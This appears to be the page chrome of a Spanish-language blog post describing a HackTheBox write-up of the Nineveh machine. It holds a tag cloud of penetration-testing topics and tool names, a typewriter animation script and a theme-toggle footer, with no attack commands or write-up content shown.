  <div class="tag-cloud"><a href="/tag/%26/" class="set-1">&</a> <a href="/tag/8.6%2C/" class="set-1">8.6,</a> <a href="/tag/ad/" class="set-1">AD</a> <a href="/tag/aspreproast/" class="set-1">ASPREPRoast</a> <a href="/tag/asrep-roast%2C/" class="set-1">ASREP-Roast,</a> <a href="/tag/asreproast/" class="set-1">ASREPRoast</a> <a href="/tag/active/" class="set-1">Active</a> <a href="/tag/admin%2C/" class="set-1">Admin,</a> <a href="/tag/admins/" class="set-1">Admins</a> <a href="/tag/admins%2C/" class="set-1">Admins,</a> <a href="/tag/archivos/" class="set-1">Archivos</a> <a href="/tag/attack%2C/" class="set-1">Attack,</a> <a href="/tag/attacks/" class="set-1">Attacks</a> <a href="/tag/azure/" class="set-1">Azure</a> <a href="/tag/bin/" class="set-1">Bin</a> <a href="/tag/bloodhound%2C/" class="set-1">BloodHound,</a> <a href="/tag/bruta%2C/" class="set-1">Bruta,</a> <a href="/tag/bruteforce%2C/" class="set-1">BruteForce,</a> <a href="/tag/burpsuite%2C/" class="set-1">Burpsuite,</a> <a href="/tag/bypass/" class="set-1">ByPass</a> <a href="/tag/bypass%2C/" class="set-1">Bypass,</a> <a href="/tag/ca/" class="set-1">CA</a> <a href="/tag/cgi-bin%2C/" class="set-1">CGI-BIN,</a> <a href="/tag/cron%2C/" class="set-1">CRON,</a> <a href="/tag/csrf/" class="set-1">CSRF</a> <a href="/tag/chkrootkit%2C/" class="set-1">Chkrootkit,</a> <a href="/tag/churrasco%2C/" class="set-1">Churrasco,</a> <a href="/tag/cifrado/" class="set-1">Cifrado</a> <a href="/tag/crackmapexec%2C/" class="set-1">Crackmapexec,</a> <a href="/tag/cron-taks%2C/" class="set-1">Cron-taks,</a> <a href="/tag/decimal%2C/" class="set-1">Decimal,</a> <a href="/tag/device/" class="set-1">Device</a> <a href="/tag/directory%2C/" class="set-1">Directory,</a> <a href="/tag/dominios%2C/" class="set-1">Dominios,</a> <a href="/tag/dovecot%2C/" class="set-1">Dovecot,</a> <a href="/tag/elastix%2C/" class="set-1">Elastix,</a> <a href="/tag/empezando%2C/" class="set-1">Empezando,</a> <a href="/tag/encrypt-decrypt%2C/" class="set-1">Encrypt-Decrypt,</a> <a href="/tag/enumeracion%2C/" class="set-1">Enumeracion,</a> <a href="/tag/enumeration%2C/" class="set-1">Enumeration,</a> <a href="/tag/evil-winrm%2C/" class="set-1">Evil-WinRm,</a> <a href="/tag/excel%2C/" class="set-1">Excel,</a> <a href="/tag/excell/" class="set-1">Excell</a> <a href="/tag/files%2C/" class="set-1">Files,</a> <a href="/tag/firefox%2C/" class="set-1">Firefox,</a> <a href="/tag/fueza/" class="set-1">Fueza</a> <a href="/tag/fuzzing%2C/" class="set-1">Fuzzing,</a> <a href="/tag/get-adobject%2C/" class="set-1">Get-ADObject,</a> <a href="/tag/getchanges-all%2C/" class="set-1">GetChanges-All,</a> <a href="/tag/gratuitas./" class="set-1">Gratuitas.</a> <a href="/tag/group%2C/" class="set-1">Group,</a> <a href="/tag/groups%2C/" class="set-1">Groups,</a> <a href="/tag/guessing%2C/" class="set-1">Guessing,</a> <a href="/tag/gwolle%2C/" class="set-1">Gwolle,</a> <a href="/tag/htb%2C/" class="set-5">HTB,</a> <a href="/tag/hacking/" class="set-4">Hacking</a> <a href="/tag/hacking%2C/" class="set-1">Hacking,</a> <a href="/tag/heartbleed%2C/" class="set-1">HeartBleed,</a> <a href="/tag/hex%2C/" class="set-1">Hex,</a> <a href="/tag/hydra%2C/" class="set-1">Hydra,</a> <a href="/tag/iis%2C/" class="set-1">IIS,</a> <a href="/tag/iis-6.0%2C/" class="set-1">IIS-6.0,</a> <a href="/tag/irc%2C/" class="set-1">IRC,</a> <a href="/tag/impackect-secretsdump%2C/" class="set-1">Impackect-SecretsDump,</a> <a href="/tag/import/" class="set-1">Import</a> <a href="/tag/juicypotato%2C/" class="set-1">JuicyPotato,</a> <a href="/tag/kerberoasting/" class="set-1">Kerberoasting</a> <a href="/tag/kerbrute/" class="set-1">Kerbrute</a> <a href="/tag/kerbrute%2C/" class="set-1">Kerbrute,</a> <a href="/tag/ldap%2C/" class="set-1">LDAP,</a> <a href="/tag/lfi%2C/" class="set-1">LFI,</a> <a href="/tag/mail%2C/" class="set-1">Mail,</a> <a href="/tag/maquina/" class="set-1">Maquina</a> <a href="/tag/maquinas/" class="set-5">Maquinas</a> <a href="/tag/mimikatz.exe%2C/" class="set-1">Mimikatz.exe,</a> <a href="/tag/mongodb%2C/" class="set-1">MongoDB,</a> <a href="/tag/mssqlclient%2C/" class="set-1">Mssqlclient,</a> <a href="/tag/multiples/" class="set-1">Multiples</a> <a href="/tag/myssql-server%2C/" class="set-1">Myssql-Server,</a> <a href="/tag/neo4j%2C/" class="set-1">Neo4j,</a> <a href="/tag/nibbleblog%2C/" class="set-1">NibbleBlog,</a> <a href="/tag/nishang%2C/" class="set-1">Nishang,</a> <a href="/tag/oscp/" class="set-4">OSCP</a> <a href="/tag/olevba/" class="set-1">Olevba</a> <a href="/tag/php%2C/" class="set-1">PHP,</a> <a href="/tag/php./" class="set-1">PHP.</a> <a href="/tag/password/" class="set-1">Password</a> <a href="/tag/path%2C/" class="set-4">Path,</a> <a href="/tag/plugins%2C/" class="set-1">Plugins,</a> <a href="/tag/popd%2C/" class="set-1">PopD,</a> <a href="/tag/portknocking%2C/" class="set-1">PortKnocking,</a> <a href="/tag/portal%2C/" class="set-1">Portal,</a> <a href="/tag/post-explotacion./" class="set-1">Post-Explotacion.</a> <a href="/tag/powershell/" class="set-1">PowerShell</a> <a href="/tag/powerup%2C/" class="set-1">PowerUp,</a> <a href="/tag/powershell%2C/" class="set-1">Powershell,</a> <a href="/tag/privesc/" class="set-1">Privesc</a> <a href="/tag/privesc%2C/" class="set-1">Privesc,</a> <a href="/tag/proteccions%2C/" class="set-1">Proteccions,</a> <a href="/tag/python%2C/" class="set-1">Python,</a> <a href="/tag/rce%2C/" class="set-1">RCE,</a> <a href="/tag/rdp-file%2C/" class="set-1">RDP-file,</a> <a href="/tag/rpcclient%2C/" class="set-1">RPCCLIENT,</a> <a href="/tag/readgmsapassword%2C/" class="set-1">ReadGMSAPassword,</a> <a href="/tag/recycle/" class="set-1">Recycle</a> <a href="/tag/remote/" class="set-1">Remote</a> <a href="/tag/retiradas/" class="set-1">Retiradas</a> <a href="/tag/retiradas%2C/" class="set-5">Retiradas,</a> <a href="/tag/retiradas./" class="set-1">Retiradas.</a> <a href="/tag/smb%2C/" class="set-1">SMB,</a> <a href="/tag/ss%2C/" class="set-1">SS,</a> <a href="/tag/ssh%2C/" class="set-1">SSH,</a> <a href="/tag/ssrf/" class="set-1">SSRF</a> <a href="/tag/ssrf%2C/" class="set-1">SSRF,</a> <a href="/tag/suid%2C/" class="set-1">SUID,</a> <a href="/tag/sam%2C/" class="set-1">Sam,</a> <a href="/tag/samba%2C/" class="set-1">Samba,</a> <a href="/tag/scheduler%2C/" class="set-1">Scheduler,</a> <a href="/tag/secretsdump.py%2C/" class="set-1">SecretsDump.py,</a> <a href="/tag/secretsdumps.py%2C/" class="set-1">Secretsdumps.py,</a> <a href="/tag/shares/" class="set-1">Shares</a> <a href="/tag/sharphound.ps1%2C/" class="set-1">SharpHound.ps1,</a> <a href="/tag/shellshock%2C/" class="set-1">ShellShock,</a> <a href="/tag/smbclient%2C/" class="set-1">SmbClient,</a> <a href="/tag/smbmap%2C/" class="set-1">SmbMap,</a> <a href="/tag/sqsh%2C/" class="set-1">Sqsh,</a> <a href="/tag/starting/" class="set-1">Starting</a> <a href="/tag/steganografia%2C/" class="set-1">Steganografia,</a> <a href="/tag/system%2C/" class="set-1">System,</a> <a href="/tag/thm%2C/" class="set-1">THM,</a> <a href="/tag/tmux-priv%2C/" class="set-1">Tmux-Priv,</a> <a href="/tag/tomcat/" class="set-1">Tomcat</a> <a href="/tag/transferencia/" class="set-1">Transferencia</a> <a href="/tag/unrealirc%2C/" class="set-1">UnRealIRC,</a> <a href="/tag/upload/" class="set-1">Upload</a> <a href="/tag/userenum%2C/" class="set-1">Userenum,</a> <a href="/tag/vnc/" class="set-1">VNC</a> <a href="/tag/web/" class="set-1">Web</a> <a href="/tag/webshell%2C/" class="set-1">Webshell,</a> <a href="/tag/wget/" class="set-1">Wget</a> <a href="/tag/winpeas%2C/" class="set-1">WinPeas,</a> <a href="/tag/windows/" class="set-1">Windows</a> <a href="/tag/windows%2C/" class="set-1">Windows,</a> <a href="/tag/wordpress%2C/" class="set-1">Wordpress,</a> <a href="/tag/wpscan%2C/" class="set-1">Wpscan,</a> <a href="/tag/writeup/" class="set-1">Writeup</a> <a href="/tag/writeup%2C/" class="set-4">Writeup,</a> <a href="/tag/xp_cmdshell%2C/" class="set-1">Xp_CmdShell,</a> <a href="/tag/xp_dirtree%2C/" class="set-1">Xp_dirtree,</a> <a href="/tag/zona%2C/" class="set-1">Zona,</a> <a href="/tag/app-js%2C/" class="set-1">app-js,</a> <a href="/tag/de/" class="set-1">de</a> <a href="/tag/fcrackzip%2C/" class="set-1">fcrackzip,</a> <a href="/tag/html/" class="set-1">html</a> <a href="/tag/injecction/" class="set-1">injecction</a> <a href="/tag/pfsense%2C/" class="set-1">pfSense,</a> <a href="/tag/pfx2john%2C/" class="set-1">pfx2john,</a> <a href="/tag/phpliteadmin%2C/" class="set-1">phpLiteAdmin,</a> <a href="/tag/privesc/" class="set-1">privesc</a> <a href="/tag/privesc%2C/" class="set-1">privesc,</a> <a href="/tag/python%2C/" class="set-1">python,</a> <a href="/tag/smtpd%2C/" class="set-1">smtpd,</a> <a href="/tag/steghide%2C/" class="set-1">steghide,</a> <a href="/tag/tar%2C/" class="set-1">tar,</a> <a href="/tag/xss/" class="set-1">xss</a></div>
  




<script>
  let i = 0;
  const text = 'Writeup de la maquina de HackTheBox llamada NINEVEH siguiendo el PATH para el OSCP';
  const speed = parseInt('50');
  
  function typeWriter() {
    if (i < text.length) {
      document.getElementById('animated-post-description').innerHTML += text.charAt(i);
      i++;
      setTimeout(typeWriter, speed);
    }
  }

  document.getElementById('animated-post-description').style.display = 'initial';
  typeWriter();
</script>

      </div>
    </main><footer class="site-footer">
  <div class="wrapper">
    <div class="credits"><a href="https://github.com/bitbrain/jekyll-dash">dash</a> theme for Jekyll by <a href="https://github.com/bitbrain">bitbrain</a> made with <i class="fas fa-heart"></i><div class="toggleWrapper">
    <input type="checkbox" class="dn" id="theme-toggle" onclick="modeSwitcher()" checked />
    <label for="theme-toggle" class="toggle">
    <span class="toggle__handler">
      <span class="crater crater--1"></span>
      <span class="crater crater--2"></span>
      <span class="crater crater--3"></span>
    </span>
        <span class="star star--1"></span>
        <span class="star star--2"></span>
        <span class="star star--3"></span>
        <span class="star star--4"></span>
        <span class="star star--5"></span>
        <span class="star star--6"></span>
    </label>
</div>
<script type="text/javascript">
const theme = localStorage.getItem('theme');

if (theme === "light") {
    document.documentElement.setAttribute('data-theme', 'light');
} else {
    document.documentElement.setAttribute('data-theme', 'dark');
}
const userPrefers = getComputedStyle(document.documentElement).getPropertyValue('content');

function activateDarkTheme() {
    document.getElementById('theme-toggle').checked = true;
    document.documentElement.setAttribute('data-theme', 'dark');
    document.documentElement.classList.add('theme--dark');
    document.documentElement.classList.remove('theme--light');
	document.getElementById("theme-toggle").className = 'light';
	window.localStorage.setItem('theme', 'dark');
}

function activateLightTheme() {
    document.getElementById('theme-toggle').checked = false;
    document.documentElement.setAttribute('data-theme', 'light');
    document.documentElement.classList.add('theme--light');
    document.documentElement.classList.remove('theme--dark');
	document.getElementById("theme-toggle").className = 'dark';
	window.localStorage.setItem('theme', 'light');
}

if (theme === "dark") {
    activateDarkTheme();
} else if (theme === "light") {
    activateLightTheme();
} else if  (userPrefers === "light") {
    activateDarkTheme();
} else {
    activateDarkTheme();
}

function modeSwitcher() {
	let currentMode = document.documentElement.getAttribute('data-theme');
	if (currentMode === "dark") {
	    activateLightTheme();
	} else {
	    activateDarkTheme();
	}
}
</script></div>
  </div>
</footer>


<script>
      window.FontAwesomeConfig = {
        searchPseudoElements: true
      }
    </script>
  </body>

</html>
